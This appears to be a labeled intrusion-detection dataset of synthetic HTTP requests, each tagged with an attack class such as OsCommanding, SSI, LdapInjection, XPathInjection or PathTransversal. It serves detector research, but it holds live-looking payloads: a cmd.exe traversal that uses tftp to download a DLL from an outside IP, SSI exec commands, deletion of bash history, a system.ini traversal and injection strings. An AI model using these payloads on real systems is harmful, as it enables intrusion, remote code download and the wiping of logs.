Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 20 Jul 05 12:34:24 GMT
Host: www.t6csn2y6aP.ch
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Cache-Control: min-fresh=0164
Client-ip: 145.49.122.114
Cookie: OioOscript3X=i1)(&(objectClass  =   eyrs*);rdutsitdpto=osLue rhU;TPn32T8topassthruJ=4510;Vn_I_QbeGmeta=coVN6Ou-
Cookie2: $Version="9"
ETag: "7EIej0sbvkZ9pzEWPz7e"
If-Match: *
Max-Forwards: 7
Authorization: 6dbG Gie2piz=7eeO8
Referer: /mqvd6ife.cgi
User-Agent: eoaeeaenFg7c
X-Forwarded-For: 229.150.251.102
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

-QmXYyGIzR=Techo5 l pth<a&6ANYTdZKSuZ=fWhbc0gp&PSTp05y.=e?r&8rt=rUesOttensenmma&n32niaedWafdec=7g ilj&S3Ahxe2uN=lEttanea~ifn&p6tlnb=480&oMs4gl=7

End - Id: 37304
Start - Id: 36746
class: OsCommanding
GET /estnxikamfA/j7iHIYo./Ofhe7vTNz7X370x/uvJlwBsFUF/Q4KrVga6GusraQ5/s_nbmf_KI8p2I_8w/eiltmbetnzin5lgtkr/fuzlo9/tfSW0iWWB8vkUG/w4igdelipnospeecdi/ptbhkrUnr/eetOsusri.php3?heuiiqt=420320&rdlkmea=%5Cn++uftp+++++-p+++www.icti.com+%2Fie%2Ficatetol%2Flaen%2Fen%2Fatmeet%2Ferge&05nD034q7.=229&ieetqP=tondhree1amedi HTTP/1.1
Host: www.uget4io.cz:80
Connection: keep-alive
Accept: video/*
Accept-Charset: ks_c_5601-1987, koi8
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 66.186.73.243
Cookie: etdrezmAa=stS>4t8?=todNdte;tu1ir6fs2=o9HvcfQh
Cookie2: $Version="9"
Date: Fri, 21 Jan 05 01:41:04 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: "KIXx6Oxds02muzfr5Oy"
If-None-Match: *
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 3
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM anpOaW5paGdldGVKdW44bHNzdGViYWFudXVhTmJPcnJheWVxOWU=
Range: 50-7
Referer: http://a5cIeHE.fr/olis.msf
TE: deflate;q=0.3,gzip,trailers
Trailer: From
User-Agent: Mozilla/3.3 (compatible; MSIE 7.9; Linux i386; Aecneis; otyhho; i9so4leO8D)
UA-CPU: Sparc
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 232x1783
Via: 2.3 www.ffnnojw.js, HTTP/5.4 www.ds3oyr.js, 5.0 www.6dtht.tiff:52
Transfer-Encoding: deflate
Upgrade: qpu/3.7
Warning: 402 161.169.10.117 "nSdo57emn" "Thu, 08 Apr 04 22:21:10 GMT"
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36746
Start - Id: 36521
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: 46.74.97.101:2217
Connection: close
Accept: audio/basic
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: aHylht-rEpf, dbjsr-ooSmhq6q, acdtoZat-wqh;q=0.3
Cache-Control: max-age=74627
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="0"
Date: Wed, 15 Jun 05 05:03:30 CET
ETag: W/".7UtDqLlCOhLK.z"
Expect: 100-continue
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Wed, 30 Aug 06 17:29:18 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "Z-DYOiZ.iK-wTpj1"
If-Range: *
Max-Forwards: 5612
MIME-Version: 8.5
Pragma: osc6St=th
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM d3Jtb3RpbmVzY240ZWkwb09sYWhvYVRlcm5wZHRseWhlOGk=
Range: 17-
Referer: /Fodnigiv.swf
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/1.3 (compatible; Konqueror/9.5; Open BSD i586; 5wnaieiat)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9877x8489
Via: 3.0 www.asSaxetn.gif, 3.5 221.229.147.43
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36521
Start - Id: 49396
class: XPathInjection
GET /sH-gfF0L.y2JB1g/eEudryqq07aut/5style/ailn9o/aecaeEI5d.bbvYaY/t0j.8V/v9LNm0/np7hCR_J.IlyLfTMG/e4cjfdhs4/dmsnhvaHfinohsUmrett/9ojntehi.php?iyaccess_logh6GluRr=n%24n&ennglrsaasiwheH=54&AuXQNoaKOYxpassthru=sreplace%27nh+1%40&sowjaldIi=ao%5C4erte+5%5C&cweuonhdnTmoaet=o&iemOdefitrEyueh=6344097&sdmeeattatn=2206551&srus1nOclie6zn=8+or+++++oTe%2FtnHO%2FSdAi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D77%5D++++or+++09%3D&X3O5tiLVdtlog=h+%3C%2Fayt%24Tft&gfe2gnhiet=%3B%28&ymogn=ehcasLss5ttmea&6ad9eHp=7&7yhsso2=osoe%3Ftymetaplr&roBfretksty=279 HTTP/1.1
Host: www.klre.biz
Connection: pragoina
Accept: video/mpeg;q=0.9
Accept-Charset: euc-tw, koi8-r, shift_jis;q=0.5, euc-jp;q=0.6, koi8-r;q=0.9
Accept-Encoding: 
Accept-Language: otl-Neoelhw;q=0.2
Cache-Control: no-store
Client-ip: 113.135.82.226
Cookie: CexecMK2=yqYvPT5RK;xIND-r0iGd=5910;dTtmeta-9locationsTm=tnKylpVWK1p;oF1l7gu1astsblk=71;lLuganio8=g1
Cookie2: $Version="461"
Date: Sun, 26 Dec 04 05:17:03 CET
ETag: "pzzWYLc9y.a5zyTx8D"
Expect: 100-continue
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Mon, 20 Nov 06 17:19:52 UTC
If-Unmodified-Since: Fri, 27 Oct 06 14:08:52 CET
If-Match: *
If-None-Match: "WWPmW-e@TlzD-.W-WKI"
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 276
MIME-Version: 1.5
Pragma: nkrreZi='ons'
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: Digest algorithm=MD5-sess
Range: 67912-847396,-254666,29-
Referer: http://gii7n.st/3mnpa/sEed.pdf
TE: chunked;q=0.6,deflate
Trailer: If-Range
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 2.8; rA-tt; rv:9.4.8) Gecko/66640110
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6489x8625
Via: FTP/9.7 18.193.169.245, 9.0 www.Bhew6.tiff:250
Transfer-Encoding: thpat; fahT=D2hhew
Upgrade: goiteB/8.3
Warning: 199 www.s2an.css "moeybagoex" "Sat, 23 May 09 04:00:06 UTC"
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49396
Start - Id: 44320
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 71.113.144.239
Connection: tweec
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity, gzip, identity;q=0.0, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 150.122.198.96
Cookie: aiY0ea9ltc=403273;amrnprmoa=auwer;e2l4TcYstnnai=o5oga rupdate;wQRvC=elio
Cookie2: $Version="7"
Date: Mon, 20 Feb 06 06:36:05 UTC
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: Tue, 06 Mar 07 01:39:17 UTC
Max-Forwards: 019
MIME-Version: 1.6
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: Basic dHN0bnRhbzpuYXV2ZA==
Authorization: Digest response="1dFb11EaFADBAFa04b6C8a388edCDdc3"
Range: -2
Referer: http://timsiae.biz/hferh/s0ooiE/irlJe/agnore.fgf
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: oa7M4waa http://www.ohztr.fr
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: edl9o/1.6 178.247.149.215, aeiwoa/7.0 www.hilefpat.jpg
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44320
Start - Id: 44992
class: PathTransversal
GET /le/eatkyentusprixM7/PDtrb/aIjh2bmc/tssgs/n6d80.XWeT3HSGlvqYN/wwL/UBcTacceptB/nes0x/igiaLL5.php4?tOee6nvsny51QbH=ediv6e3eact%40us&ilr=shutdownhRiin&ti0etc=doc%28file%3A%2F%2F%2Fc%3A%2Fq9%2FiHh.xml+++++%29&oy=eyeoTRCdQKI&Doyaours9c=ibuupdwhdsibO2ihdw&dny2w=ia&U@FbWUQ-Efstyle=2831&lesudhIlcjrtn=+p HTTP/1.1
Host: www.Wlni75e.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=9413
Cookie: Nmh31rfieed==homestdinn3n+eq
Date: Mon, 23 Nov 09 23:35:00 UTC
From: SiHai3@Rl2imga.fr
If-Unmodified-Since: Fri, 23 Jan 09 21:05:08 GMT
If-Match: *
Referer: http://sctwoe.gov/rihambac/euhE3bty/ycoyytmE/wozt.js
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 3.4; kd-da; rv:2.5.3) Gecko/24733207
Via: 6.9 www.llgof.png:2198, 7.1 www.aema.jpeg:341
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44992
Start - Id: 49516
class: XPathInjection
GET /1dachildu61stdinFeoA/6aWohwP0dnodePqy.mspx?ssrnnnt7hy1mi5=iTl%27+++or+++1%3C+++++ehtHe%2Fwm1%2Fz%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D19%5D+or++%278ssyhott%27+%3D+++%27&dnrNuo0Iu40ur=%299bgsound7dn%3Cp4ef9s HTTP/1.0
Host: www.idrlDxTii.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: c-eil, n-e, w-8t;q=0.9, pmsxdehe-rvi4r;q=0.4, lfr-eOqeePaA;q=0.9
Cache-Control: only-if-cached
Client-ip: 106.82.80.243
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Tue, 05 Jun 07 02:13:03 UTC
ETag: "c4bAi8O6ysm4iSCRBk-"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Mon, 03 Aug 09 17:33:16 UTC
If-Unmodified-Since: Wed, 17 Mar 10 23:13:04 CET
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: "_b4ZC9NdaVMRsUBjNa"
If-Range: *
Max-Forwards: 22
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest response="9BB6B27FDc09F001de66A19b5ca82987"
Range: -88469
Referer: http://www.6dOwia.de/cahh/ep0dcsSk/atssnt/t6h7r12b.bin
TE: gzip;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 7.0; tu-ta; rv:6.9.5) Gecko/68562598
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7997x438
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: compress
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49516
Start - Id: 37443
class: LdapInjection
GET /ousN4fLS/oJ-xsnCd/Il1nwU5g7wfromN0O1/eMjh_j5O0cEeMNdL/iWnpbhL_iF-q4CoN3CE4/14bROITUbHod/rmfEAW1y@MqL/bioie3Edi/irr.gif? HTTP/1.1
Host: www.yypErtibse.ch
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.4, x-mac-turkish;q=0.8
Accept-Encoding: gzip;q=0.1, gzip, identity;q=0.0, compress, gzip
Accept-Language: eehs-0s;q=0.7, 86es2-ir, zacbU-caitysas, tf1Oacr-n;q=0.1
Cache-Control: only-if-cached
Client-ip: 167.96.231.211
Cookie: bsenoln=dkAks59UOG5;ossbasc=a6;f6t=u3jN;ulHeodaCmeo==clibalysystem nodeont;S5Ahlbaiikchi=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="7"
Date: Wed, 28 Jan 04 07:47:00 CET
ETag: "BkjDVxvYi_aPqZ5Wa"
Expect: cnei
From: 9E59@tlno.st
If-Modified-Since: Thu, 18 Aug 05 19:42:25 CET
If-Unmodified-Since: Tue, 07 Sep 04 03:17:25 GMT
If-Match: "RlIhME21cBdNAmHb0"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic OGU2QTpIZWg1
Authorization: e7uo iLLRasn=lebw
Range: 387-37527,056473-,-7
Referer: /ysnos/iTa1o/olypat/Redur.asmx
TE: deflate;q=0.1,gzip
Trailer: Expect
User-Agent: tkvoYE2 http://www.tmei.uk
UA-Disp: 3647,135,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5384x829
Via: 5.1 www.aelra.html
Transfer-Encoding: gzip
Warning: 331 125.242.135.234 "ahfeE" 
X-Forwarded-For: 188.52.154.151
X-Serial-Number: 678720
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37443
Start - Id: 40175
class: SSI
GET /srLI7yhORIWiXa/dicVId2LuVCDjUB/isrteaHttenntt/Oaeed3tasq/dGmSUtFx/WabNsZjzRgS/i7e1/to7jCWzL-/kx3rCTTxImj4/r1K891uT9UtznUrv.gif?sdo6rr=%3C%21+%23%3C%21--+++++%23exec+++cmd%3D%22id%22--%3E&dr=noautoexecmleE+arulosock_streamv HTTP/1.0
Host: www.yXitv.net
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: wp2-7a4mhAtk, K-anlwdt, uetbbXo-yizf8N;q=0.6, msi4er-zEmntigv, cnNpsbzl-cwlah
Cache-Control: no-transform
Client-ip: 34.79.0.86
Cookie: hizymunegt=0ooc;nfnrfnte6in=ec o+sn;j4TreplaceZac=wcfoeanoststet;nr=9NoorLyieiede626n
Cookie2: $Version="360"
Date: Sun, 28 Jan 07 02:25:39 CET
ETag: "Wlv33KefxTo2553"
Expect: 100-continue
From: ehdOien@nrfOlifTi.org
If-Modified-Since: Tue, 21 Apr 09 03:05:44 CET
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: *
If-Range: "xLK6@SKCu.SC2DlD"
Max-Forwards: 51
MIME-Version: 8.8
Pragma: Ei6oon=nt
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: NTLM ZWJzc3VlcmgzY1RUYnJtdWF1aHNub3I4b2xyb2xzYXRnZHRtYW92bnR1dG4=
Range: 85-
Referer: /soiEtme.tar
TE: trailers
Trailer: Warning
User-Agent: typnlEeH
UA-CPU: StrongARM
UA-Disp: 6994,159,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8851x316
Via: FTP/3.4 www.tydtChOt.html
Transfer-Encoding: jndta
Upgrade: moke/1.6, hxef/0.0, hp0ky/1.9, nstdo/7.4, smon/0.7
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40175
Start - Id: 39359
class: SSI
GET /-zIFlU2bkx.O/copykKGUK@05/Whrxldmaa/BZWKehstyle1_telnet2/o2cMWf6T4fbYir4X2pR/hut3nsA/rC9hsat/0F0Gx0u.F.css?EUwinnt5=slean&aB=hy&ldtezliaee=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&LaNeun5lheOsa=asammhe&WigR=a3&foeasnt0Ila=zP7nlOaCUEb&7g=7exec HTTP/1.1
Host: www.irtn.com
Connection: spotn7IG
Accept: */*
Accept-Charset: hz-gb-2312, cp-932;q=0.6, gb2312;q=0.5
Accept-Encoding: 
Accept-Language: notz-P9hftdTo, ieEL0sby-sa
Cache-Control: tnsR='v'
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Fri, 17 Dec 04 24:09:54 GMT
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: Sat, 26 Jun 04 13:18:48 UTC
Max-Forwards: 3145
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Basic c29nYWhoOlVwUjBtaHNh
Range: 009-9597,-73,-30
Referer: /dilieh/coec/deomFeun/shhO5i/dejl.cfm
TE: chunked;q=0.7,gzip,deflate
Trailer: Referer
User-Agent: eet69ye (bGriCf)
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 0.5 www.giaaAl.tiff, 2.8 www.faoe.css, 5.0 114.64.76.24
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 272 89.226.33.172 "u5suuhnPlqlsret" "Sun, 08 Jan 06 24:45:20 GMT"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39359
Start - Id: 38533
class: LdapInjection
GET /@NaandimgeE6TYMjy/zthxd3ri/mgzutrs/IM5S9pttgLoweCd/gW1Bj/hLLAbe99pm9uWFibW7wZ/geOee8osft/qyriarn0aRcStAdeasRk/tlhbnnlvs2inias.bin?A6SPQWb=oVSKTmg6ahC&dei9a2eactHcues=eh6&v7dHi6=5903&yease6=gag6erlaeisyt&ahetbhhnetlnml=ewpanyutnssctOpadn&rrohdawa9He=0064%29%28%26%28objectClass%3DsEs%29%28%7C%28sn+%3D++++5d%29%28cn%3Dbe+++J*%29%29&7_J.W39xeY24=hdaahavinglenceoaarie&yert3e=dntiaxtghogiU6ue&pwKupdateNMH=cedeletergdivAl%3Bo&bNyEreisvCaiU=3746339848&sodE=uf&i9ocr2l3hSr=ne+%3Ct&oXPvgscriptjCSA3a=nFBrv&ndtlt6s=icOpz6cQsPsv&ueoeE=esaritn%26i%26odl HTTP/1.0
Host: 137.130.43.189
Connection: doheeIE
Accept: audio/*, text/plain;q=0.8, application/postscript
Accept-Charset: iso-8859-15;q=0.7, iso-8859-5;q=0.8, windows-1250;q=0.0, x-mac-chinesesimp;q=0.0, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 101.131.250.156
Cookie: ypnsoaiomtite8o=molhyw4faude;iframe.telnetoftpNkM=50218;RxVZ=waooneE/tHexecfromiFh;hpjgid= 4oom
Cookie2: $Version="13"
Date: Thu, 10 Sep 09 06:57:45 GMT
ETag: W/"Skq7NrJ3aRvLT1Z"
Expect: 100-continue
From: n9eatae@mdeel.gov
If-Modified-Since: Sat, 28 Apr 07 05:44:22 GMT
If-Unmodified-Since: Mon, 26 Apr 04 16:27:22 GMT
If-Match: "5vg-cso4gsJ2GI3Xh."
If-None-Match: *
If-Range: *
Max-Forwards: 377
MIME-Version: 8.2
Pragma: m5Gd='bi26e'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 301-86,62-,5905-
Referer: http://Er3euA.cz/rsaxkI/kPa51oki.jpg
TE: gzip,trailers
Trailer: If-Range
User-Agent: ieQbLDv-N http://www.ieeane6.fr
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8726x4401
Via: 6.7 www.ahhw5.png:61761, 8.3 www.hehoe.gif
Transfer-Encoding: compress
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38533
Start - Id: 40056
class: SSI
GET /heVdEiv5gJE/91.xzXrkrcy1qU/6kkbgsound/na/inkeen/t6NtuNGkhu.h.css?dhlNsdb4acr=%3C%21--++%23exec++++cmd%3D%22%2Fbin%2Fls+++-l+++%2Fhome%2FItoad%2Fn3emontnfs%22+--%3E&yqiDSoiEen7t=r6o&rv8uGeIaNem5Old=eh HTTP/1.0
Host: www.qtalao0e8.org
Connection: close
Accept: audio/*;q=0.9, audio/*
Accept-Charset: windows-1254, iso-2022-kr, euc-tw;q=0.7, iso-8859-6;q=0.4, macintosh
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="9"
Date: Sun, 02 May 04 02:20:22 GMT
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: eL2Sfnt@tHEerioe.de
If-Modified-Since: Sat, 06 Mar 10 15:33:13 UTC
If-Unmodified-Since: Sun, 24 Feb 08 02:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9045
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: c6smia gndeone=etbon7nf
Range: 271-,17364-
Referer: /Xqs6eooj/oasn/td7anso.asp
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 9.3; IA-cp; rv:7.8.2) Gecko/69017051
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: 3.5 160.131.188.245, FTP/2.0 17.134.19.141
Transfer-Encoding: deflate
Upgrade: biaEr/9.5, oeSlsn/3.8, eylE/7.1
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40056
Start - Id: 36629
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: www.3edno8eo.biz
Connection: vhpnpRtd
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 107.48.3.140
Cookie: pn=57824;iseee1t=881;urriow=pu>k@6Thd;processing-instructionnCNzlinkHi=644027670;tet=g8DClC
Cookie2: $Version="2"
Date: Tue, 15 Jan 08 12:31:10 UTC
ETag: ".sUnDhMU.R.TvYeWEG"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 08 Jun 04 07:20:25 GMT
If-Unmodified-Since: Wed, 28 Jul 04 19:39:57 GMT
If-Match: "5pgR@UAQxysEehx"
If-None-Match: *
If-Range: Thu, 05 Nov 09 09:20:03 UTC
Max-Forwards: 3150
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM b1JldHRpYXNhaWloaGlhdnh0ZGpRZWhza3IwYW90MGlCeGM=
Range: 75537-,8-
Referer: /R8wce/r3mrR7b.mdb
TE: chunked;q=0.9,trailers,deflate
Trailer: TE
User-Agent: lp8Y4dkr@s http://www.Hrnb.uk
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 477x077
Via: HTTP/2.2 www.ueone.css
Transfer-Encoding: identity
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 899 114.184.147.28:3879 "8dwEnsh88ee" 
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36629
Start - Id: 35975
class: PathTransversal
GET /formc8du-Olike5F/ejsi/.U@.anph-y6P1wK/senu9ylbmpgatthnse/eXpe7eyl/iFGNCC5wHvtd/it/rs/eJF/NraehvbfroeayE.jpg?42Ltelnet17urb=isljnlr&PwzV=ueztires3rSinw6n0m&services5execfwp-aCk5=92971&gs6eelnb=rm%3A1&lossraTrokha=oUSHk&mhivuyHeohc=+ebodyTmo+%3Da+&ls97hn=ipetEdohp0ieuthssb&teanbltyonw2roF=0143577143&EHVkyNh=eitixl&ZKHp3=075355250&Steedzaetrd=x8f9iflitptsir&et3p49trqltiiar=usr+access_logivfeeed+ HTTP/1.0
Host: 99.44.60.10
Connection: beqoac
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2, koi8;q=0.0, cp-932;q=0.7, x-mac-ce
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.149.12.94
Cookie: nflan5op3omit=Onfd;wvdihaipnad7t=..\..\..\..\..\..\..\..\..\WINNT\system.ini
Cookie2: $Version="5"
Date: Sat, 30 Aug 08 04:07:40 CET
ETag: "yNSzClVJDfWDD-ln"
If-None-Match: "pZ4W0ckYneDJNShF"
Max-Forwards: 5205
Proxy-Authorization: hmqda d8tos=aszU4
Authorization: Digest realm
Referer: http://www.u2be.gov/fmusienn/f3wxsee9/Iioit/ennEth/hKtepac.png
TE: trailers
User-Agent: dDrIarni (ou2.PNF; ee.agp.nNs)
UA-CPU: 68000
Via: 8.4 www.nreotes.shtml, HTTP/9.1 www.neeat.shtml:8507

null

End - Id: 35975
Start - Id: 43234
class: OsCommanding
GET /thln2fchprjendmaywb/Ztelnett/1ffefNir/chi4K/fJgH@CFfO7UP/0x2/XDLlVA@@VJQ9scriptM/h7Z/isrnstU9/eqENH67/aVV/a-.png?eom=00196726&ernsAttStu=45389388&ft=%27+%3B+++++rm++++%7E%2F.bash_history+%3B&wa8ryrsaibh=esicuet4ewmde+o&V_TaM=+%3C&acceptYaJ=tac&l7eal69nsti=nw07CxGSYsmG&Dtn5d=6305&eisi0eez7setas=sHT&bf9st6hezd=s0n9&ie=049209338&gRzecp=2 HTTP/1.1
Host: www.i4iro1dxe.st:80
Connection: ecxsof7d
Accept: image/*;q=0.2, text/xml;q=0.8
Accept-Charset: euc-cn;q=0.3, gb2312
Accept-Encoding: identity;q=0.5
Accept-Language: *
